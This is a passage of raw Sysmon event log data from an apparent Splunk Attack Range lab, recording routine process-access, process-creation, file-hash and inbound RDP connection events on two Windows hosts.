14:53:03.723{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062835Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:03.723{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062834Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:03.723{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062833Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:03.723{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EACF-607E-630B-00000000BB01}1628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000062832Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:03.723{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EACF-607E-630B-00000000BB01}1628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000062831Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:03.724{A7A01FEF-EACF-607E-630B-00000000BB01}1628C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe" --ps2C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000062830Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:03.207{A7A01FEF-EACF-607E-620B-00000000BB01}58046000C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000062829Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:03.145{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=10640983EA706113D464B0B15F497A11,SHA256=86268BE3BC77211E482ADB62F2493B7169E44945A263C9D11EBA3F26AF0039D9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000049186Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:03.673{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=86ABA3A6017981265EDA5AC60A6428E9,SHA256=B18E07319070C4527943AAB1052B19BB3291458F17069FDCBDE36F9818251A66,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049185Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:01.031{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-50517-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 354300x800000000000000062828Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:01.551{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-21341-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062827Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:01.377{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com49656-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 10341000x800000000000000062826Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:03.051{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EACF-607E-620B-00000000BB01}5804C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062825Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:03.051{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062824Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:03.051{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062823Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:03.051{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062822Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:03.051{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062821Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:03.051{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EACF-607E-620B-00000000BB01}5804C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000062820Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:03.051{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EACF-607E-620B-00000000BB01}5804C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000062819Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:03.052{A7A01FEF-EACF-607E-620B-00000000BB01}5804C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{A7A01FEF-B624-607E-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{A7A01FEF-E37F-607E-4D0A-00000000BB01}5988C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000049189Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:04.892{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=78F76B61B21070D859029F16C76A27FA,SHA256=CBC87F6471EA863695293B42108473F02C67787E847778C3315948EEB9D1BB53,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049188Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:02.826{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com61221-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 23542300x800000000000000062844Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:04.738{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F727FFEF36F0BDBF6CA857CC732B8DA7,SHA256=89A7B1B5269A5D0C044A5918032300F47D8DD9210952483F128ACF1B129B75C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000062843Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:04.160{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F28882DC3A989706D699E306CA7E360,SHA256=6BBA8290BAA59071B7FA776F9EEEEF102E0522EBEA44C00FF26453194B3D4DE7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000062842Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:02.773{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.85scanner.openportstats.com60341-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 354300x800000000000000062841Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:02.741{A7A01FEF-B626-607E-0F00-00000000BB01}1136C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse5.188.206.230-22708-false10.0.1.14win-dc-339.attackrange.local3389ms-wbt-server 23542300x800000000000000049192Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:05.985{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76C89245DD52BB2A30CEF87DB150E77D,SHA256=11D5B642AA9F44FA06FBFEE0C5BA07E8C044A3C9AE0360E0FB20F4ECDF6D71D7,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000049191Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:03.657{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52466-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x800000000000000049190Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:53:03.392{85C0FFC9-B7ED-607E-0F00-00000000BB01}948C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse80.82.77.234scanner.openportstats.com51439-false10.0.1.15win-host-895.attackrange.local3389ms-wbt-server 10341000x800000000000000062853Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:05.863{A7A01FEF-E380-607E-510A-00000000BB01}63405272C:\Windows\system32\conhost.exe{A7A01FEF-EAD1-607E-640B-00000000BB01}6784C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062852Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:05.863{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062851Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:05.863{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062850Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:05.863{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062849Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:05.863{A7A01FEF-B625-607E-0C00-00000000BB01}6686764C:\Windows\system32\svchost.exe{A7A01FEF-B636-607E-2800-00000000BB01}2560C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000062848Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:05.863{A7A01FEF-B624-607E-0500-00000000BB01}6441184C:\Windows\system32\csrss.exe{A7A01FEF-EAD1-607E-640B-00000000BB01}6784C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000062847Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:53:05.863{A7A01FEF-E37F-607E-4D0A-00000000BB01}59884344C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{A7A01FEF-EAD1-607E-640B-00000000BB01}6784C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program 